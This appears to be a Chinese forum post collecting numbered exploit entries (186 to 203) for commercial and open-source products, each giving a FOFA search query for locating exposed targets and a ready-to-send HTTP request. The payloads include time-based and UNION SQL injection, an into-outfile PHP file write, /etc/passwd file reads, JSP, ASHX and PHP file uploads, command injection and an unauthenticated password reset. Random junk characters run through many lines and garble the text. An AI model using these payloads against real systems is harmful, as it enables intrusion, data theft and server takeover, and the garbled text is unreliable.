7 B9 A- c4 A7 ~. S) DGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1& K1 L+ X& x' k1 m. |) z! p
Host: host
+ W$ [( s' O- \7 C9 r, i4 T+ F, y8 E6 Z- S5 C3 H. d' g9 l
8 u& i8 G; P9 T6 L: c
186. F-logic DataCube3 SQL注入
% _. m. q- R7 p5 [- E4 MCVE-2024-31750
1 X" _8 B+ H8 [7 n( ?F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
! @: @5 q# I6 o0 ~ UFOFA:title=="DataCube3"
( |, @/ j! m6 F% M5 }* w! i6 X2 _POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
3 A: m/ W/ }: n4 MHost: your-ip
6 s/ B) q+ ^9 a3 N8 S( CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
W# R0 n$ [, ?2 j5 L. Y( \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8% k) B l2 n6 d1 h0 z4 l2 C# w4 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; L8 |) T$ u1 w
Accept-Encoding: gzip, deflate1 B8 q6 s- I; i+ @
Connection: close/ Z d: }0 [5 m+ R# j9 z3 r
Content-Type: application/x-www-form-urlencoded
2 s7 y0 U- |/ z8 V8 p
! s( k( K- w* c: ureq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
* ?( K8 w4 N5 j( m4 z
% Q+ R( |3 C( Q) U$ f4 k
/ P- ~( v7 B& K8 @. z K187. Mura CMS processAsyncObject SQL注入" H& y; s( Z2 p
CVE-2024-32640$ K" U/ m( ?6 }2 d0 U. e
FOFA:"Mura CMS") H: [) n* @- ]+ N! z
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1! n; l {) T( Y8 Z
Host: your-ip
) K* [5 Z1 \2 c) tContent-Type: application/x-www-form-urlencoded( k+ z( X% n( \3 A" Z, g: G
0 o" e0 \/ y w& o* P: p* I% [) \3 h, D
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1) g, Y4 t* Q& x. K/ b z% o( f
j8 n/ D) z7 }5 W! V1 R6 e, |; m0 n$ @: y: D7 p
188. 叁体-佳会视频会议 attachment 任意文件读取6 v7 {* m$ U/ {
version <= 3.9.7
/ C8 H& e: Z% M. Y/ `: XFOFA:body="/system/get_rtc_user_defined_info?site_id"
; D* x8 f; d) d TGET /attachment?file=/etc/passwd HTTP/1.1
( K& |( \0 [% ]. h, G+ i( T9 `7 M( ^Host: your-ip& p# D6 U J2 b8 U0 n. \( k2 n0 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 X- T! j9 F9 S* E$ q, y( b3 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ [$ P0 C: I5 R+ z6 ^
Accept-Encoding: gzip, deflate0 z7 w& e. ~3 ]0 c" f! C. `2 ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; h: d& S2 z; G1 g4 v
Connection: close
! w, K- S- b0 M6 k
7 c0 L# T0 D c* [2 T1 w5 T! G, Y% Q: ^2 Z. h
189. 蓝网科技临床浏览系统 deleteStudy SQL注入. O2 ?( M" p1 ~% {7 y5 s
FOFA:app="LANWON-临床浏览系统"
5 ^( ?+ w1 Z8 z) G, v7 W+ o* N" `GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
^& I" k7 n: I4 [1 U/ }Host: your-ip9 i! _% ~+ P& f, m: s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. L% |" F3 {) V7 f: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) j0 w1 Y6 R6 `7 S7 RAccept-Encoding: gzip, deflate9 T# N/ R4 G- X: _5 A, G6 A0 X: L
Accept-Language: zh-CN,zh;q=0.96 _' F) m! R E1 F: A/ V5 _0 A7 `6 F# I
Connection: close7 C. Q. } c" O. z
3 n5 Q$ W* z: N! W: j& x
* }2 E! o1 G. L+ a/ q190. 短视频矩阵营销系统 poihuoqu 任意文件读取4 k1 z6 t' u9 M4 R8 ~" k* N
FOFA:title=="短视频矩阵营销系统"+ a% D- v9 o4 H ~/ G3 S
POST /index.php/admin/Userinfo/poihuoqu HTTP/2; V* [) z7 E. {% ]+ h4 \3 i4 y
Host: your-ip7 R& B5 ?5 w+ p! \% @. e" l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
6 R2 S* T) y& j0 l8 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
" }& r. J0 M" x) R3 j( k, iContent-Type: application/x-www-form-urlencoded' O8 l) o: q1 `) u/ L
Accept-Encoding: gzip, deflate
( `8 o+ g. {7 d% m: w% R+ A+ [Accept-Language: zh-CN,zh;q=0.9; Y8 p: n) i Q
+ q3 v: l K- D1 g8 M9 u' _poi=file:///etc/passwd
9 @9 X9 y% B7 m' f1 v/ O0 m6 d7 D2 I, Y
A) |- D/ P7 I6 \) c: k( Q
7 V7 t \- [: N) A% {4 n5 H1 J191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入, x) o ]( t; [1 \4 E( f9 \( a
FOFA:body="/CDGServer3/index.jsp"
' s6 n! i9 S/ e0 LPOST /CDGServer3/js/../NavigationAjax HTTP/1.1/ U' v% \, R4 m# |# T' Q
Host: your-ip
- L, T5 u! _. L! IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ q/ T4 M0 V0 g% \5 E7 B
Content-Type: application/x-www-form-urlencoded
4 e3 Q) \/ E/ T$ t9 ^* H G* H7 I0 E- p0 i0 v( |- X5 J. s
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=5 N; l1 t, r" U( ~! J, x- e3 e8 X% g
! }! d# Y' ]5 Q: a7 g3 D' s6 @8 a2 p9 ?! f8 [2 Z; `
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
- c2 _4 f4 x2 @( ^1 X3 n% {FOFA:title="用户登录_富通天下外贸ERP"2 ] |4 w+ a0 [ N) G) ]. q7 O
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.10 q& L$ v3 L* \) w5 w5 O# H! X
Host: your-ip5 {* v- o2 T/ w: t- ^& h. K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 V4 `1 ^& s' g' ~& yContent-Type: application/x-www-form-urlencoded5 b* H! s) S- u4 l
! P) _3 \ C7 f' K4 A8 G7 _) y( M! f4 p4 R4 T3 n
<% @ webhandler language="C#" class="AverageHandler" %>8 u5 q; l' Z0 N9 \
using System;; A* ?( a& g6 a Y/ k8 R
using System.Web;+ t( s+ Y8 @ K
public class AverageHandler : IHttpHandler" C8 e. U. m1 B& e. }" L' r
{
$ u2 N: B+ s3 w! |8 G9 L- [5 upublic bool IsReusable
/ W" o$ q6 n% M: y3 _! W9 j" | k! @{ get { return true; } }
; T& r% |5 @) u$ ?public void ProcessRequest(HttpContext ctx)6 Q) O* X; h; U, K: Q6 x
{: S! J3 |1 k3 j& p9 @) q8 V7 f
ctx.Response.Write("test");
" _4 ]" I2 O4 V! i" s9 G+ A}" d5 `. u& i( C& j9 k! p% Y
}5 L: E. c0 K4 {( D. T
7 F# }5 t& o/ M: u3 g* q- M- Y9 A+ N: k% a4 t
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
. ~# y5 K' i9 {- o n. \FOFA:body="山石云鉴主机安全管理系统"
) G4 U) G" E, v( ?: ]GET /master/ajaxActions/getTokenAction.php HTTP/1.1+ J# V2 S- m2 C
Host:
- }. [# W8 d9 c" S+ J0 q6 VCookie: PHPSESSID=2333333333333;
! V% ?/ H5 i& ?9 e+ G* V7 N8 PContent-Type: application/x-www-form-urlencoded! }! v6 f2 W, J* R' _
User-Agent: Mozilla/5.07 {- D. h- n5 H/ E
) e5 u2 Z) M) M: H/ L" U9 b
. B, p6 V3 \2 m/ r1 l
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1/ m% }- f. k5 N% f6 P2 T
Host:
4 t7 i: b: p( z1 \6 s# |User-Agent: Mozilla/5.0( F. |1 d& D$ S4 R0 |- K+ ~
Accept-Encoding: gzip, deflate
# g7 g3 h6 ?7 d9 BAccept: */*
- Y+ [/ m4 }. d2 W: k2 ^& a5 XConnection: close2 L6 `% ~7 w% Q9 D. V5 y
Cookie: PHPSESSID=2333333333333;8 l! X! K- q2 N( D
Content-Type: application/x-www-form-urlencoded
* N! l! f, H) }1 F- [. ]) ]Content-Length: 846 ~5 ]1 D2 u# O' Z3 J
* P. O& m/ ^! Z9 b7 A$ R" ?% Sparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
1 f9 a+ b# R: g' d: n* I6 ~2 e
; H+ {% ]% Q: q0 ^1 w7 o, T U! ~) |9 F# m& m
GET /master/img/config HTTP/1.1
) C7 ~3 C/ o0 V4 [9 q4 sHost:
0 b1 ~/ @; x8 ~( EUser-Agent: Mozilla/5.04 ~3 d/ P4 s! r- S6 `. L2 f
4 W1 J- S1 g7 k7 @& D
6 `1 a* D- s( N4 H1 w194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
# k c' H; l2 jFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在) x6 J3 L% ]. E- r/ f: A# i
9 n% J" U* E1 W+ [POST /servlet/uploadAttachmentServlet HTTP/1.1! m" w- d5 l' V. X5 N7 g* D
Host: host4 H6 \/ y6 y4 k* G* N0 \( t8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.367 z: a( O8 ?: L" N! o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% X& w& M1 [$ h; E; Y- j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) P- B$ i% t2 {: [Accept-Encoding: gzip, deflate
& o0 G" a; [% z! d8 xConnection: close/ p6 U7 _6 U5 r7 X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk1 ?' h2 s8 T) o3 B
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 ]( i) ~) V# S( p Z. v5 r. Q. ]0 S. q# |) ^1 _1 l
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"* m2 E A4 P! x: L
Content-Type: text/plain2 ]& Q j3 Z5 N- D* E, L
<% out.println("hello");%>
" b& L5 ^6 K! ]( i9 w------WebKitFormBoundaryKNt0t4vBe8cX9rZk9 \5 M( T3 e6 y: {
Content-Disposition: form-data; name="json"
, D- L' q( i- d! T {"iq":{"query":{"UpdateType":"mail"}}}
; h0 z, P u7 }------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
; t% y4 M; @, L3 X) H# y
7 l$ ]! |3 l3 L' a$ c5 s# E& K* W. ^. U: |
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 g z r2 k7 v' i- z6 \, e- K1 O
FOFA:title=="飞鱼星企业级智能上网行为管理系统5 X8 f6 ^4 J4 T
POST /send_order.cgi?parameter=operation HTTP/1.1
" Q5 G+ X0 Q9 D: gHost: 127.0.0.19 h1 o4 V$ X6 P- h7 X0 v
Pragma: no-cache
: u) n8 N9 h, Y8 V% G; DCache-Control: no-cache& ^) n) Y% p4 _- p# I) D7 e( {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 r0 P7 M! D8 ^3 x8 z6 aAccept: */*
[$ x& _8 F" h/ I+ s& Z3 [) nAccept-Encoding: gzip, deflate# U1 t, ?' q" z; _8 O5 ?
Accept-Language: zh-CN,zh;q=0.9
- c- b t+ q5 s' a7 tConnection: close
# p; k: Y2 z! b/ `% OContent-Type: application/x-www-form-urlencoded
* r* {: g; A# o3 j: m- z3 h7 }1 TContent-Length: 68& C) Q" a( h% C9 r! S$ O
0 P5 Y/ S) G' S8 l+ @
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
: v7 O K. v7 D' m; _% }9 _4 y4 [% f! d6 L
$ O" q5 L( \+ j$ U p) F) ^
: M! q, V5 g& `" i6 k4 h196. 河南省风速科技统一认证平台密码重置
5 A' F9 A- t1 x( cFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
) r. b2 `7 \: c5 z5 `' A8 T$ ePOST /cas/userCtl/resetPasswordBySuper HTTP/1.1- {! x1 X" t% V5 p9 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" `) H+ b i$ L# P7 P0 o
Content-Type: application/json;charset=UTF-8$ J4 F: \4 n- v- d; ~+ t& C
X-Requested-With: XMLHttpRequest
3 E( }5 t0 w- WHost:
+ w7 c. v, ]0 F6 AAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2" e# k& _+ L- J& @2 y9 A4 n
Content-Length: 45
9 x# ^ E3 e) W o- U8 {Connection: close
9 C' w8 J f) K8 R
5 {) U" C# Q6 d6 {3 Q* p{"xgh":"test","newPass":"test666","email":""}
( J1 {: X) A! g; g* b0 g+ g
+ V* W+ C- t* A& D$ f z& Y% r* E5 }) O
* r% k* l' W4 J* W$ u" ~
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入, Q v5 `: s, n/ i f
FOFA:app="浙大恩特客户资源管理系统"% @( _+ {* v% |* b4 y
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
9 E8 u4 f* r" }; v! p7 BHost:% |* h$ @% M" X Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
1 k0 |7 i2 k5 p5 V8 y, K- z5 tAccept-Encoding: gzip, deflate& ], C: j: X5 }; s z1 D
Connection: close) D! o" C' R- C& g, u
3 a1 s) R' d4 z- q/ ]
( j) L; A9 N& x- Y) ?) M
k- A+ @3 V/ b, g, U7 S% F198. 阿里云盘 WebDAV 命令注入 S2 f2 P' S% z, j- C) T: \
CVE-2024-296400 m/ d, Q: ~4 n+ d& z9 B
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
( A' @9 [! e: a( ~Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64* t3 y6 `2 B- \5 W/ D. V7 V
Accept: */*7 D; v; h7 Y7 Q
Accept-Encoding: gzip, deflate. _- T7 N9 c, j K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
$ |4 E" t5 _- K( R0 ]9 L$ ^; UConnection: close
! M3 k: V- k/ G- A8 w4 l K8 O* M9 a$ ]
2 a2 n% X, h' w- A199. cockpit系统assetsmanager_upload接口 文件上传
0 u3 i$ C& N o( z/ W1 c$ Y# |. \$ W: l- ~$ Q
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
! E7 _5 x* b! |" y2 B, q/ zGET /auth/login?to=/ HTTP/1.19 V9 t- G# k+ O- O& c i1 [ w6 j
6 d! o% i7 J# k% _2 y响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
8 b7 _ m; v O0 |7 U% s
+ G& y. j3 Q4 `% A& l4 n2.使用刚才上一步获取到的jwt获取cookie:
# A+ s7 B4 T0 a* T4 a' \: C1 {
! V$ s* e, O4 l1 |2 L& @7 tPOST /auth/check HTTP/1.1 A3 S2 K8 q/ X- ?
Content-Type: application/json/ Z- _9 D8 h1 S0 T& H# \
, m' x* J; P! s& D& z' {* s% I' ~
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}1 ?, c- I5 A, y; S4 W5 |
( x. V/ C8 a/ A! j响应:200,返回值:
! W9 I: q0 Y. g, L4 P& q0 f9 WSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
3 {0 h: |5 w. c" O3 M% TFofa:title="Authenticate Please!"4 X' c) N9 b" J! R' C
POST /assetsmanager/upload HTTP/1.19 p& M" J% o; W- H) F
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3% c* m8 J& O! k5 o. z
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
9 j/ w. M4 }0 j8 g' C R6 ?
/ P, H: x" _% r# d/ l-----------------------------36D28FBc36bd6feE7Fb3 J9 x6 L, j* u
Content-Disposition: form-data; name="files[]"; filename="tttt.php"3 V: u) k9 F4 f2 X
Content-Type: text/php6 G$ v9 L/ k! _( F# o
, B# m( u/ Q" h$ ]0 w6 A: l<?php echo "tttt";unlink(__FILE__);?>6 L! K2 R" A0 L. y6 O4 a
-----------------------------36D28FBc36bd6feE7Fb3! v1 o2 w! ]2 r$ _0 z
Content-Disposition: form-data; name="folder"
3 s( |6 t5 o1 |# x0 K- v# T1 S3 F
; S& f0 _% E, K2 J; q6 R6 R-----------------------------36D28FBc36bd6feE7Fb3--) X2 W% ~1 |7 v' F. o7 K
& e. P: a+ D: X& o$ W, o7 [/ c) o; I [: r4 |+ n/ X# s
/storage/uploads/tttt.php8 O+ Y0 q2 j1 l
% G7 h3 ^1 N% Z/ p+ {3 m* X200. SeaCMS海洋影视管理系统dmku SQL注入
+ z0 [; ?% k9 q( c2 m2 XFOFA:app="海洋CMS"6 P: P5 B( \4 V% C( h1 l$ O
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
1 m/ [0 F/ i, |1 R: r' aCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
' |- v( M) v* A3 @" t5 i1 iUpgrade-Insecure-Requests: 1
6 @6 C2 t; A8 d. U0 |( fCache-Control: max-age=0
- X& B. M: @- T0 q& y$ W- _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' Z; S) T7 j. lAccept-Encoding: gzip, deflate" R; z& V. I5 ^ O+ g- ~
Accept-Language: zh-CN,zh;q=0.9! q$ v7 ?! ^6 c" @$ D
9 s/ s. ~* x; T: A1 J9 R9 P$ u* ]; Z* N( K0 z
201. 方正全媒体新闻采编系统 binary SQL注入: v* Y$ u" n6 R/ c
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"5 D6 s( v" |* r+ O: t2 L9 \
POST /newsedit/newsplan/task/binary.do HTTP/1.1% m$ J1 y2 L& F0 r; Q; m, n2 z/ M# W
Content-Type: application/x-www-form-urlencoded* z0 K$ s/ x9 ~2 y% M. F) X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" d0 t7 x- r) t- p- b6 Q6 u
Accept-Encoding: gzip, deflate- L+ v& P" G" s+ F4 [1 E
Accept-Language: zh-CN,zh;q=0.9+ q% j# N) ?% I$ J
Connection: close
4 j3 m! _5 f2 D f! x2 J9 O- a- |8 K% }! Q. U7 j5 o
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
& ?9 _& a5 k' f/ Z3 \
& \: Q% ^& d7 \7 n* y- A
" l0 V- T! @7 R8 C- p/ {, _7 K202. 微擎系统 AccountEdit任意文件上传# D( \8 I# R/ }" u4 b
FOFA:body="/Widgets/WidgetCollection/"1 ]9 b0 m. Z+ \' w6 D* J2 u0 L! ~
获取__VIEWSTATE和__EVENTVALIDATION值
4 C1 E- b; b% s& Q7 E2 ~GET /User/AccountEdit.aspx HTTP/1.1' d" n& Q4 A) |# @ n( y+ o
Host: 滑板人之家
' l: y. N8 k+ ]' `6 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
~. q( ~8 @9 r/ m$ e4 {3 GContent-Length: 0# ]( x9 U9 r3 m- O4 A0 A" t" d4 n
7 g, z( W" E c
+ I' a7 d1 R/ h5 P6 J. ^; y) h1 u替换__VIEWSTATE和__EVENTVALIDATION值
* J- q& R Y/ G; Z1 _POST /User/AccountEdit.aspx HTTP/1.19 O8 h& p# ]7 P6 |9 A
Accept-Encoding: gzip, deflate, br
4 d) w: }' M) G3 r* ]Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687) y! z8 V1 T1 q+ r E3 a
& d' N2 H4 ]9 T) ]( I+ M+ S9 f-----------------------------786435874t385875938657365873465673587356878 [9 Y0 E& q6 j9 Z4 K
Content-Disposition: form-data; name="__VIEWSTATE"
6 R- F9 c+ {9 y/ H" u' z
* x4 t. K8 f3 _5 ?# ~) Y- P__VIEWSTATE1 T; k4 W0 u: q; V/ | H1 E
-----------------------------786435874t38587593865736587346567358735687
4 P: y. N+ ^' r3 z0 Z$ fContent-Disposition: form-data; name="__EVENTVALIDATION"# N: I: K; Y# k! i$ G0 D' _ ^6 l
4 e% K1 M; c9 t
__EVENTVALIDATION
( `1 ?- o* j* Y, |2 h8 R4 H-----------------------------786435874t385875938657365873465673587356878 N2 c! A3 s) `( @% W
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
( W9 T7 H7 A- K& H3 |- S/ y% uContent-Type: text/plain& t. u- `" S9 q7 y8 }
9 x4 N/ R$ e* s! IHello World!+ q! y( Z; p% y
-----------------------------786435874t38587593865736587346567358735687* d: y) \1 F* h6 e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
/ f' \' Z' G" E: T8 N' C1 y
1 \! |" l0 R1 r3 Z$ d: u上传图片! |1 q# R: F6 h3 ]! V+ m
-----------------------------786435874t38587593865736587346567358735687: a' ?8 L5 f$ k/ p. V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"" \* O* r. n1 ~3 k: ~
- Y9 i8 |2 C/ f, T$ K4 y5 R6 k
& w$ [, w% s0 R: I) H. u-----------------------------786435874t38587593865736587346567358735687* u/ V3 W: h* x% r- f6 k
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
9 T/ ~: a' B: A, ^1 O- v5 w% [5 X D
5 `* `8 O; \2 }
-----------------------------786435874t38587593865736587346567358735687--, \+ Z- r, U( F) \7 d
( ?8 _2 Q8 X. W) \# f
2 ]& h) }! R) o$ L- l4 B/_data/Uploads/1123.txt
* i5 o; y1 V7 j5 s' x
+ v _3 [2 r2 h& i: d# M203. 红海云EHR PtFjk 文件上传( p! j9 F4 v* p! I
FOFA:body="RedseaPlatform"; r+ k7 m$ H2 p- n; f& e8 g
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
4 p8 n4 v9 P2 cHost: x.x.x.x
$ m( q: L/ R7 n+ v+ DAccept-Encoding: gzip3 `6 p7 v' A" B8 r* @( j; l7 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 Z m2 y! U6 g9 G% Z- i' {Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4; u% l7 m1 s4 G: w' c4 h
Content-Length: 210
: X4 p: Y' B) B. v
3 V! x% ?* [7 q6 t2 v/ I+ H------WebKitFormBoundaryt7WbDl1tXogoZys4
! {/ F; k; {7 ~8 N( c+ I5 P OContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
- Z8 l: C3 l4 k/ n+ S! D4 h! @" RContent-Type:image/jpeg: ~! f; m" F3 m. a: ? Y5 L
0 b+ P$ n% Y2 i<% out.print("hello,eHR");%>. }( H5 _& N5 F/ v7 _/ S4 k
------WebKitFormBoundaryt7WbDl1tXogoZys4--
( \4 _( Q' s: Z
( N' { @0 K8 s; C | F! r+ U
. w1 g s; h$ J T$ f7 z' {$ w6 B, R3 }
3 `' _" ?* P B! J' L. R
; f) p' [( q+ F2 j" N+ F% U/ h, k
7 C7 j1 G J+ Q
|
发表于 2024-6-5 14:31:29
收藏
支持
反对